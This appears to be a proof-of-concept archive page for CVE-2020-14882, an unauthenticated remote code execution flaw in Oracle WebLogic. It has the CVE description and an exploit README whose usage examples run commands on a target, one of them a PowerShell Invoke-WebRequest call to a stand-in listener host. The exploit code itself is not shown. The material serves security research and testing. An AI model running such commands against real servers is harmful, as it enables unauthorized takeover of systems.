Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2020-14882 PoC — Oracle WebLogic Server 安全漏洞

Source
Associated Vulnerability
Title:Oracle WebLogic Server 安全漏洞 (CVE-2020-14882)
Description:Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Description
This script allows for remote code execution (RCE) on Oracle WebLogic Server
Readme
# CVE-2020-14882
This script enables remote code execution (RCE) on Oracle WebLogic Server using an unauthenticated GET request. It exploits the vulnerability CVE-2020-14882. By executing arbitrary commands, an attacker can gain unauthorized access to the server.

## Exploit Details

- Exploit Title: Oracle WebLogic Server, Unauthenticated RCE via GET request
- Exploit Author: Danny Safaya
- CVE: CVE-2020-14882
- Vendor Homepage: [Oracle WebLogic Server](https://www.oracle.com/middleware/technologies/weblogic.html)
- Software Link: [Oracle Middleware Downloads](https://www.oracle.com/technetwork/middleware/downloads/index.html)
- More Info: [WebLogic RCE by only one GET request (CVE-2020-14882) analysis](https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf)

## Usage

Make sure you have Python 3 installed. To use this script, follow the steps below:

1. Open a terminal or command prompt.
2. Run the script using the following command:
    ```
    python3 exploit.py http(s)://target:7001 command
    ```
   Replace `http(s)://target:7001` with the target URL of the Oracle WebLogic Server, and `command` with the desired command to execute.
   
   **Example 1:**
   ```
   python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
   ```
   This example executes the command `nslookup your_Domain` on the target server.
   
   **Example 2:**
   ```
   python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
   ```
   This example executes the PowerShell command `Invoke-WebRequest -Uri http://your_listener` on the target server.

## Warning

**This script is intended for authorized penetration testing and security research purposes only.** Unauthorized use of this script to exploit systems without proper consent is illegal and may result in legal consequences. Use it at your own risk.

## Dependencies

This script requires the following dependencies:

- `requests`
- `urllib3`

Please ensure that these dependencies are installed before running the script.

---
File Snapshot

[4.0K] /data/pocs/3c4ecf076e6785cbb96406c6e6387e7857febbb6 ├── [ 34K] LICENSE ├── [1.0K] main.py └── [2.0K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →